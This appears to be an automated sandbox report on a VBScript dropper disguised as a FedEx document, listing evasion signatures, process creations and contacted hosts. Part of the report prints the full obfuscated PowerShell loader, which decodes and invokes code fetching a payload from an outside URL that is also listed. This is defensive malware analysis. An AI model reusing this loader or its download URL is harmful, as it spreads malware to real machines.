Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Uses ping.exe to sleep
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1 Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5140 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4743 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 1416 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4840 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe File Volume queried: C:\Windows\System32 FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000002.1237590407.00000284111A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000002.1237590407.00000284111A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*
Source: wscript.exe, 00000000.00000003.1217340072.00000284130D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1216836950.00000284130D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1237702330.00000284111C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215790449.00000284130D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235415478.00000284130C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217146005.00000284111AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235205702.00000284130BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235560881.00000284111C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1237998113.00000284130CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRepo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping %.%.%.% Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Memoirer = 1;$Pennefjerene245='Substrin';$Pennefjerene245+='g';Function Tabellariske($Assessorerne57){$Dekorationernendmarcherne110=$Assessorerne57.Length-$Memoirer;For($Dekorationerne=5; $Dekorationerne -lt $Dekorationernendmarcherne110; $Dekorationerne+=(6)){$Egebark130+=$Assessorerne57.$Pennefjerene245.Invoke($Dekorationerne, $Memoirer);}$Egebark130;}function Gdedes($Ondograph){. ($Parkin) ($Ondograph);}$Frieri=Tabellariske 'ForarMChimeoSexopzEmceiipiepolMyt.olBundtaNaiad/ H gh5 C,it.Af.en0Drost Nabog(EmissWC mplibve.sn ,ynadInsnao Connw L,cosEf.er BrugsNNonalT utb Sind1 roer0Paros.Balka0B,dri;.rama TsarWD sbei,enitn N gl6borts4energ;Fulda HistixTauri6 m da4Kotur; S is DietarRallyvVeri,:Frems1P eli2Condy1zinco.Falte0Eksam) Str. OminsGEmbedesaccucmakkek Ev noAfgjo/My.op2penci0Malmh1 U,fe0Forew0Prste1Syntr0St.ve1Fremm BilfFGo.hii futurBookse T.ecfNonc,oBebudxSe io/Burd.1Color2Ibrug1 Kniv.tel f0 Indu ';$Tempestuous=Tabellariske ',olarUmak,osBlokaeU nigrGodst-SuperA Spl,gUneleenarcin Salgtj,bga ';$Volow159=Tabellariske 'cab.ahGeno.tShirttPediapNedis:Fac.n/ Post/ PeaicFurazrStuddyKidnapDipletaktivo .inecApotehAquilrColanoJomfrnDeveliA,axicForudl Afpae tchbsUrteh.Inte.i YeddoPebfl/Trai mB.comgnon xbF.ssioadult1 Past/Mo.phNBerneoNytten Un riL.gnenLjsersEsdratArbejrS.steuSve,dm Bride,onzanIndkotW,undaHyinglA onilOptniyBlaaj. KeypqQuarrxVelgrd,adde ';$Baandvv=Tabellariske 'Dolme>Skots ';$Parkin=Tabellariske 'PassiiElapie VicexOps.g ';$Sulevlling = Tabellariske 'Cu che BreacOrdenhBeordoWald Si e%Ska.ra Fly.pNyh,dpSlumpdd.mmea ploutCl imaAgerd%Tis.y\S,adspSyndia ccenrCompaa ,tond rndbeBio,erS,cari kottnYuckegToxiceBlok rKhasanFerieeSekse.AdderSProcttCabb ePortu Unpro& Asso& Calf SteneGemysc Eva h Kro oHardd resse$St.ep ';Gdedes (Tabellariske 'spiro$Rea.cgMytholovertoL gnebHyperaArmodlArres:Arb.jRKrtegoTeknosOprems PulveSemibl Corrl.ibleifarmanRat fi CavosHand,=Verek(UdstacEutopmSubcodgulvm Noti / Terrc abel Dupli$BrainSTertiu ovolDrbyseHenlevBrsspl Gyptlsouthi FundnInterg Stil)Justi ');Gdedes (Tabellariske 'Appea$MahargGodmol nteroA,klebMusicaConfelYd rp:Poss,eProc,kDukkesK.ffepB.lene Teatr BalatBespalWhirriS.cren PinciHethie ensn .nre=,picl$avlsdVThougo,heumlelen,oKvad wTopch1Weeke5Infer9Defer.billasBefarpCecidlTekniiManu.tLeuco(Hjem $,orplBAloeraIncapaHa slnNaiandKollev SemivScoa.)Permi ');$Volow159=$ekspertlinien[0];Gdedes (Tabellariske 'Macro$ SkrmgBushwlAdelsoAmfetbHvsnia BlodlNapol:FormesLovemo.ommal.ocioo Car.sM.onspHieroiAfrunlFemk s Serp= C emN Vej eCrompwAnger-Sta.lOSmigrb DeltjIndisefarvecEnougtLin,e eng,SCiselyF.ttos Bar,tHori eAntismFe,ul.CanceNForlgeBemantchlor.CesarWInstreDakenb CephC Menfl AstriTandbePerfen Sup tStopp ');Gdedes (Tabellariske 'Forre$F,rgas PredoImagelI,iotoGammes r,bepAccidiAnkyllOverasPyrom. P nkHgoldbeSmrreaFrygtdKul.ieS.brarsrbehs Ho o[Pr,co$SquifTKloake C.ibmMacroppaakre Ove.sKalcitPreacuHft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\paraderingerne.Ste && echo $" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$memoirer = 1;$pennefjerene245='substrin';$pennefjerene245+='g';function tabellariske($assessorerne57){$dekorationernendmarcherne110=$assessorerne57.length-$memoirer;for($dekorationerne=5; $dekorationerne -lt $dekorationernendmarcherne110; $dekorationerne+=(6)){$egebark130+=$assessorerne57.$pennefjerene245.invoke($dekorationerne, $memoirer);}$egebark130;}function gdedes($ondograph){. ($parkin) ($ondograph);}$frieri=tabellariske 'forarmchimeosexopzemceiipiepolmyt.olbundtanaiad/ h gh5 c,it.af.en0drost nabog(emisswc mplibve.sn ,ynadinsnao connw l,cosef.er brugsnnonalt utb sind1 roer0paros.balka0b,dri;.rama tsarwd sbei,enitn n gl6borts4energ;fulda histixtauri6 m da4kotur; s is dietarrallyvveri,:frems1p eli2condy1zinco.falte0eksam) str. ominsgembedesaccucmakkek ev noafgjo/my.op2penci0malmh1 u,fe0forew0prste1syntr0st.ve1fremm bilffgo.hii futurbookse t.ecfnonc,obebudxse io/burd.1color2ibrug1 kniv.tel f0 indu ';$tempestuous=tabellariske ',olarumak,osblokaeu nigrgodst-supera spl,guneleenarcin salgtj,bga ';$volow159=tabellariske 'cab.ahgeno.tshirttpediapnedis:fac.n/ post/ peaicfurazrstuddykidnapdipletaktivo .inecapotehaquilrcolanojomfrndevelia,axicforudl afpae tchbsurteh.inte.i yeddopebfl/trai mb.comgnon xbf.ssioadult1 past/mo.phnberneonytten un ril.gnenljsersesdratarbejrs.steusve,dm bride,onzanindkotw,undahyingla oniloptniyblaaj. keypqquarrxvelgrd,adde ';$baandvv=tabellariske 'dolme>skots ';$parkin=tabellariske 'passiielapie vicexops.g ';$sulevlling = tabellariske 'cu che breacordenhbeordowald si e%ska.ra fly.pnyh,dpslumpdd.mmea ploutcl imaagerd%tis.y\s,adspsyndia ccenrcompaa ,tond rndbebio,ers,cari kottnyuckegtoxiceblok rkhasanferieesekse.addersprocttcabb eportu unpro& asso& calf stenegemysc eva h kro ohardd resse$st.ep ';gdedes (tabellariske 'spiro$rea.cgmytholovertol gnebhyperaarmodlarres:arb.jrkrtegoteknosoprems pulvesemibl corrl.ibleifarmanrat fi cavoshand,=verek(udstaceutopmsubcodgulvm noti / terrc abel dupli$brainstertiu ovoldrbysehenlevbrsspl gyptlsouthi fundninterg stil)justi ');gdedes (tabellariske 'appea$maharggodmol nteroa,klebmusicaconfelyd rp:poss,eproc,kdukkesk.ffepb.lene teatr balatbespalwhirris.cren pincihethie ensn .nre=,picl$avlsdvthougo,heumlelen,okvad wtopch1weeke5infer9defer.billasbefarpcecidltekniimanu.tleuco(hjem $,orplbaloeraincapaha slnnaiandkollev semivscoa.)permi ');$volow159=$ekspertlinien[0];gdedes (tabellariske 'macro$ skrmgbushwladelsoamfetbhvsnia blodlnapol:formeslovemo.ommal.ocioo car.sm.onsphieroiafrunlfemk s serp= c emn vej ecrompwanger-sta.losmigrb deltjindisefarvecenougtlin,e eng,sciselyf.ttos bar,thori eantismfe,ul.cancenforlgebemantchlor.cesarwinstredakenb cephc menfl astritandbeperfen sup tstopp ');gdedes (tabellariske 'forre$f,rgas predoimageli,iotogammes r,bepaccidiankylloveraspyrom. p nkhgoldbesmrreafrygtdkul.ies.brarsrbehs ho o[pr,co$squiftkloake c.ibmmacroppaakre ove.skalcitpreacuhft
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$memoirer = 1;$pennefjerene245='substrin';$pennefjerene245+='g';function tabellariske($assessorerne57){$dekorationernendmarcherne110=$assessorerne57.length-$memoirer;for($dekorationerne=5; $dekorationerne -lt $dekorationernendmarcherne110; $dekorationerne+=(6)){$egebark130+=$assessorerne57.$pennefjerene245.invoke($dekorationerne, $memoirer);}$egebark130;}function gdedes($ondograph){. ($parkin) ($ondograph);}$frieri=tabellariske 'forarmchimeosexopzemceiipiepolmyt.olbundtanaiad/ h gh5 c,it.af.en0drost nabog(emisswc mplibve.sn ,ynadinsnao connw l,cosef.er brugsnnonalt utb sind1 roer0paros.balka0b,dri;.rama tsarwd sbei,enitn n gl6borts4energ;fulda histixtauri6 m da4kotur; s is dietarrallyvveri,:frems1p eli2condy1zinco.falte0eksam) str. ominsgembedesaccucmakkek ev noafgjo/my.op2penci0malmh1 u,fe0forew0prste1syntr0st.ve1fremm bilffgo.hii futurbookse t.ecfnonc,obebudxse io/burd.1color2ibrug1 kniv.tel f0 indu ';$tempestuous=tabellariske ',olarumak,osblokaeu nigrgodst-supera spl,guneleenarcin salgtj,bga ';$volow159=tabellariske 'cab.ahgeno.tshirttpediapnedis:fac.n/ post/ peaicfurazrstuddykidnapdipletaktivo .inecapotehaquilrcolanojomfrndevelia,axicforudl afpae tchbsurteh.inte.i yeddopebfl/trai mb.comgnon xbf.ssioadult1 past/mo.phnberneonytten un ril.gnenljsersesdratarbejrs.steusve,dm bride,onzanindkotw,undahyingla oniloptniyblaaj. keypqquarrxvelgrd,adde ';$baandvv=tabellariske 'dolme>skots ';$parkin=tabellariske 'passiielapie vicexops.g ';$sulevlling = tabellariske 'cu che breacordenhbeordowald si e%ska.ra fly.pnyh,dpslumpdd.mmea ploutcl imaagerd%tis.y\s,adspsyndia ccenrcompaa ,tond rndbebio,ers,cari kottnyuckegtoxiceblok rkhasanferieesekse.addersprocttcabb eportu unpro& asso& calf stenegemysc eva h kro ohardd resse$st.ep ';gdedes (tabellariske 'spiro$rea.cgmytholovertol gnebhyperaarmodlarres:arb.jrkrtegoteknosoprems pulvesemibl corrl.ibleifarmanrat fi cavoshand,=verek(udstaceutopmsubcodgulvm noti / terrc abel dupli$brainstertiu ovoldrbysehenlevbrsspl gyptlsouthi fundninterg stil)justi ');gdedes (tabellariske 'appea$maharggodmol nteroa,klebmusicaconfelyd rp:poss,eproc,kdukkesk.ffepb.lene teatr balatbespalwhirris.cren pincihethie ensn .nre=,picl$avlsdvthougo,heumlelen,okvad wtopch1weeke5infer9defer.billasbefarpcecidltekniimanu.tleuco(hjem $,orplbaloeraincapaha slnnaiandkollev semivscoa.)permi ');$volow159=$ekspertlinien[0];gdedes (tabellariske 'macro$ skrmgbushwladelsoamfetbhvsnia blodlnapol:formeslovemo.ommal.ocioo car.sm.onsphieroiafrunlfemk s serp= c emn vej ecrompwanger-sta.losmigrb deltjindisefarvecenougtlin,e eng,sciselyf.ttos bar,thori eantismfe,ul.cancenforlgebemantchlor.cesarwinstredakenb cephc menfl astritandbeperfen sup tstopp ');gdedes (tabellariske 'forre$f,rgas predoimageli,iotogammes r,bepaccidiankylloveraspyrom. p nkhgoldbesmrreafrygtdkul.ies.brarsrbehs ho o[pr,co$squiftkloake c.ibmmacroppaakre ove.skalcitpreacuhft Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430126 Sample: CR-FEDEX_TN-775537409198_Doc.vbs Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 30 google.com 2->30 32 cryptochronicles.io 2->32 38 Multi AV Scanner detection for domain / URL 2->38 40 Antivirus detection for URL or domain 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Sigma detected: WScript or CScript Dropper 2->44 8 wscript.exe 1 2->8         started        signatures3 process4 signatures5 46 VBScript performs obfuscated calls to suspicious functions 8->46 48 Suspicious powershell command line found 8->48 50 Wscript starts Powershell (via cmd or directly) 8->50 52 4 other signatures 8->52 11 powershell.exe 14 33 8->11         started        14 PING.EXE 1 8->14         started        16 cmd.exe 1 8->16         started        18 PING.EXE 1 8->18         started        process6 dnsIp7 34 cryptochronicles.io 192.185.84.89, 49701, 49702, 49703 UNIFIEDLAYER-AS-1US United States 11->34 20 conhost.exe 11->20         started        22 cmd.exe 1 11->22         started        36 google.com 142.250.65.238 GOOGLEUS United States 14->36 24 conhost.exe 14->24         started        26 conhost.exe 16->26         started        28 conhost.exe 18->28         started        process8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.65.238
 google.com United States
15169 GOOGLEUS false
192.185.84.89
 cryptochronicles.io United States
46606 UNIFIEDLAYER-AS-1US false

Contacted Domains

Name IP Active
cryptochronicles.io 192.185.84.89 true
google.com 142.250.65.238 true
windowsupdatebg.s.llnwi.net 69.164.46.0 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://cryptochronicles.io/mgbo1/Noninstrumentally.qxd false unknown